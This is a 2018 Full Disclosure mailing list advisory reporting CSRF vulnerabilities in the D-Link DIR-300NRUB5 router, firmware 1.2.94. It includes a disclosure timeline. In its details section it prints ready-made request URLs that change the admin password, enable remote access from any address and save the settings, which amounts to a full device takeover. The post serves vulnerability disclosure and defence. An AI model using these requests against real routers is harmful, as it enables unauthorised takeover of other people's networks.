Full Disclosure mailing list archives
CSRF vulnerabilities in D-Link DIR-300
From: "MustLive" <mustlive () websecurity com ua>
Date: Fri, 13 Jul 2018 23:52:42 +0300
Hello list! There are new Cross-Site Request Forgery vulnerabilities in D-Link DIR-300. After my previous advisory. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DIR-300NRUB5, Firmware 1.2.94. All previous versions also must be vulnerable. ---------- Details: ---------- After previous AoF, BF and CSRF vulnerabilities, here is new Cross-Site Request Forgery holes. To take control over device it's needed to make few CSRF requests: change admin's password, login is fixed (this is earlier mentioned AoF vulnerability), turn on remote access and save settings. Cross-Site Request Forgery (WASC-09): Change admin's password: http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password| Add settings to turn on remote access: http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1 Change current settings to turn on remote access: http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1 Delete settings of remote access: http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1 Save all changes in settings of device: http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y ------------ Timeline: ------------ 2016.03.17 - announced at my site about vulnerabilities in DIR-300. 2016.08.27 - disclosed at my site previous advisory about DIR-300. 2017.09.30 - disclosed this advisory (http://websecurity.com.ua/8165/). 2014-2018 - informed developers about multiple vulnerabilities in this and other D-Link devices. Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CSRF vulnerabilities in D-Link DIR-300 MustLive (Jul 17)